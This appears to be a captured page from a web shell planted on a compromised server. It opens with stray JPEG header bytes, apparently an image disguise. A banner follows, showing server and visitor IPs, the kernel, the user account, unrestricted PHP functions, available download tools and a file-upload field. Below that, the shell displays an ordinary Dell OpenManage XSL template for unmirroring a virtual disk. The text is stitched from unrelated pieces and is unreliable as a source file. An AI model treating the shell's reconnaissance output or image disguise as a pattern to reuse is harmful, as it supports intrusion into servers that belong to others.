����JFIF��x�x����'
Server IP : 78.140.185.180 / Your IP : 3.128.24.183 Web Server : LiteSpeed System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : builderbox ( 1072) PHP Version : 7.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /opt/dell/srvadmin/var/lib/openmanage/xslroot/sm/template/common/ |
Upload File : |
<?xml version="1.0" encoding="UTF-8"?> <!-- This is the XSL to render the Virtual Disks Information page. The associated web plugin is the VDInfoWebPlugin. --> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:fo="http://www.w3.org/1999/XSL/Format"> <!-- Include some common templates created by SS --> <xsl:template match="OMA"> <DataArea backpagetarget="./DataArea?plugin=com.dell.sm.webplugins.VDInfoWebPlugin" printable="false" email="false" validate="true" Refresh="false" export="false" exportdata="false"> <xsl:attribute name="submit">./SubmitForm?plugin=com.dell.sm.webplugins.VDExecuteActionWebPlugin&ControllerOID=<xsl:value-of select="ControllerOID"/>&ControllerName=<xsl:value-of select="ControllerName"/>&VDiskOID=<xsl:value-of select="VDiskOID"/>&VDiskName=<xsl:value-of select="VDiskName"/>&Action=16384&help=vdprin</xsl:attribute> <xsl:attribute name="submitdisplay"><xsl:value-of select="$strUnMirror"/></xsl:attribute> <xsl:attribute name="validate">true</xsl:attribute> <xsl:attribute name="backpagedisplay"><xsl:value-of select="$strCancel"/></xsl:attribute> <xsl:attribute name="backpagetarget">./DataArea?plugin=com.dell.sm.webplugins.VDInfoWebPlugin&ControllerOID=<xsl:value-of select="ControllerOID"/>&ControllerName=<xsl:value-of select="ControllerName"/>&Action=blank&help=vdprin</xsl:attribute> <PageTitle> <xsl:attribute name="display"><xsl:value-of select="$strTitlePart1"/><xsl:value-of select="ArrayDisks/@VirtualDiskName"/><xsl:value-of select="$strTitlePart2"/></xsl:attribute> </PageTitle> <!--SubHeader> <xsl:attribute name="display"><xsl:value-of select="$strSubHeader"/></xsl:attribute> </SubHeader--> <AlertMessage> <xsl:attribute name="display"><xsl:value-of select="$strSubHeader"/></xsl:attribute> </AlertMessage> <!--SubHeader> <xsl:attribute name="display"><xsl:value-of select="$strSubHeader2"/></xsl:attribute> </SubHeader--> <AlertMessage status="3"> <xsl:attribute name="display"><xsl:value-of select="$strSubHeader2"/></xsl:attribute> </AlertMessage> <script language="javascript"> function validate() { // Validate doesn't need to validate any data, but just needs to prompt the user // to verify the want to continue with the delete. confirm( ) will return true when // the user selects OK and false when the user selects CANCEL. var unmirrorMsg = "<xsl:value-of select="/OMA/VDiskName"/><xsl:value-of select="$strColon"/><xsl:value-of select="$strSpace"/><xsl:value-of select="$strRUSure"/>"; var cfrm = confirm(unmirrorMsg); if(cfrm) { //using this function to turn off submit and back buttons. disableButtons("submit","back" ,""); } return (cfrm); } </script> </DataArea> </xsl:template> </xsl:stylesheet>